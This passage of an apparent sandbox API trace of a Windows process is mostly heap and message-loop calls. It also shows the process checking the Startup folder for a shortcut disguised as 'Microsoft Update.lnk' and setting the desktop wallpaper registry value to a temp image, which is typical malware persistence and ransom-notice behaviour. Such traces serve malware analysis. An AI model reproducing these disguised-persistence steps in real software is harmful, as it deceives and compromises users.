wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0242.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0242.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0242.665] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0242.665] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0242.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0242.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0242.666] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0242.666] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0242.666] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0242.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0242.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0242.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0242.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0242.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0242.667] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0242.667] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0242.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0242.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0242.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0242.668] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0242.668] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.668] timeGetTime () returned 0x117c948 [0242.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.668] Sleep (dwMilliseconds=0xa) [0242.706] timeGetTime () returned 0x117c977 [0242.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0242.706] TranslateMessage (lpMsg=0x8cf798) returned 0 [0242.706] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0242.706] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0242.706] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0242.707] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.707] Sleep (dwMilliseconds=0xa) [0242.753] timeGetTime () returned 0x117c9a6 [0242.753] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.753] Sleep (dwMilliseconds=0xa) [0242.787] timeGetTime () returned 0x117c9c5 [0242.787] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.787] Sleep (dwMilliseconds=0xa) [0242.824] timeGetTime () returned 0x117c9e4 [0242.824] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.824] Sleep (dwMilliseconds=0xa) [0242.847] timeGetTime () returned 0x117ca03 [0242.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.847] Sleep (dwMilliseconds=0xa) [0242.865] timeGetTime () returned 0x117ca13 [0242.865] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.865] Sleep (dwMilliseconds=0xa) [0242.892] timeGetTime () returned 0x117ca23 [0242.892] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.892] Sleep (dwMilliseconds=0xa) [0242.909] timeGetTime () returned 0x117ca42 [0242.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.909] Sleep (dwMilliseconds=0xa) [0242.925] timeGetTime () returned 0x117ca52 [0242.925] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.925] Sleep (dwMilliseconds=0xa) [0242.941] timeGetTime () returned 0x117ca61 [0242.941] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.941] Sleep (dwMilliseconds=0xa) [0242.957] timeGetTime () returned 0x117ca72 [0242.957] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.958] Sleep (dwMilliseconds=0xa) [0242.990] timeGetTime () returned 0x117ca90 [0242.990] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.990] Sleep (dwMilliseconds=0xa) [0243.003] timeGetTime () returned 0x117caa0 [0243.003] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.003] Sleep (dwMilliseconds=0xa) [0243.018] timeGetTime () returned 0x117caaf [0243.018] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.018] Sleep (dwMilliseconds=0xa) [0243.035] timeGetTime () returned 0x117cabf [0243.035] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.035] Sleep (dwMilliseconds=0xa) [0243.050] timeGetTime () returned 0x117cacf [0243.050] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.050] Sleep (dwMilliseconds=0xa) [0243.065] timeGetTime () returned 0x117cade [0243.065] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.065] Sleep (dwMilliseconds=0xa) [0243.081] timeGetTime () returned 0x117caee [0243.081] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.081] Sleep (dwMilliseconds=0xa) [0243.096] timeGetTime () returned 0x117cafd [0243.096] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.096] Sleep (dwMilliseconds=0xa) [0243.112] timeGetTime () returned 0x117cb0d [0243.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.112] Sleep (dwMilliseconds=0xa) [0243.128] timeGetTime () returned 0x117cb1d [0243.128] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.128] Sleep (dwMilliseconds=0xa) [0243.144] timeGetTime () returned 0x117cb2c [0243.144] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.144] Sleep (dwMilliseconds=0xa) [0243.159] timeGetTime () returned 0x117cb3c [0243.159] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.159] Sleep (dwMilliseconds=0xa) [0243.175] timeGetTime () returned 0x117cb4c [0243.175] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.175] Sleep (dwMilliseconds=0xa) [0243.190] timeGetTime () returned 0x117cb5b [0243.190] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.190] Sleep (dwMilliseconds=0xa) [0243.206] timeGetTime () returned 0x117cb6b [0243.206] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.206] Sleep (dwMilliseconds=0xa) [0243.221] timeGetTime () returned 0x117cb7a [0243.221] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.221] Sleep (dwMilliseconds=0xa) [0243.237] timeGetTime () returned 0x117cb8a [0243.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.237] Sleep (dwMilliseconds=0xa) [0243.253] timeGetTime () returned 0x117cb9a [0243.253] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.253] Sleep (dwMilliseconds=0xa) [0243.340] timeGetTime () returned 0x117cbe8 [0243.340] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.340] Sleep (dwMilliseconds=0xa) [0243.362] timeGetTime () returned 0x117cc07 [0243.363] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.363] Sleep (dwMilliseconds=0xa) [0243.378] timeGetTime () returned 0x117cc17 [0243.378] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.378] Sleep (dwMilliseconds=0xa) [0243.394] timeGetTime () returned 0x117cc26 [0243.394] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.394] Sleep (dwMilliseconds=0xa) [0243.409] timeGetTime () returned 0x117cc36 [0243.409] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.409] Sleep (dwMilliseconds=0xa) [0243.425] timeGetTime () returned 0x117cc46 [0243.425] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.425] Sleep (dwMilliseconds=0xa) [0243.440] timeGetTime () returned 0x117cc55 [0243.440] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.440] Sleep (dwMilliseconds=0xa) [0243.456] timeGetTime () returned 0x117cc65 [0243.456] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.456] Sleep (dwMilliseconds=0xa) [0243.472] timeGetTime () returned 0x117cc74 [0243.472] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0243.472] TranslateMessage (lpMsg=0x8cf798) returned 0 [0243.472] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0243.472] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0243.473] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0243.473] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.473] Sleep (dwMilliseconds=0xa) [0243.487] timeGetTime () returned 0x117cc84 [0243.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.487] Sleep (dwMilliseconds=0xa) [0243.503] timeGetTime () returned 0x117cc94 [0243.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.503] Sleep (dwMilliseconds=0xa) [0243.527] timeGetTime () returned 0x117cca3 [0243.527] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.527] Sleep (dwMilliseconds=0xa) [0243.550] timeGetTime () returned 0x117ccc3 [0243.550] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.550] Sleep (dwMilliseconds=0xa) [0243.565] timeGetTime () returned 0x117ccd2 [0243.565] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.565] Sleep (dwMilliseconds=0xa) [0243.580] timeGetTime () returned 0x117cce1 [0243.580] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.580] Sleep (dwMilliseconds=0xa) [0243.597] timeGetTime () returned 0x117ccf2 [0243.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.597] Sleep (dwMilliseconds=0xa) [0243.612] timeGetTime () returned 0x117cd02 [0243.613] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.613] Sleep (dwMilliseconds=0xa) [0243.628] timeGetTime () returned 0x117cd11 [0243.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.628] Sleep (dwMilliseconds=0xa) [0243.644] timeGetTime () returned 0x117cd21 [0243.644] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.644] Sleep (dwMilliseconds=0xa) [0243.660] timeGetTime () returned 0x117cd30 [0243.660] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.660] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0243.660] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0243.660] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0243.660] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0243.660] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0243.661] RegCloseKey (hKey=0x4e0) returned 0x0 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731e8 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0243.661] HeapFree (in: hHeap=0x2af0000, 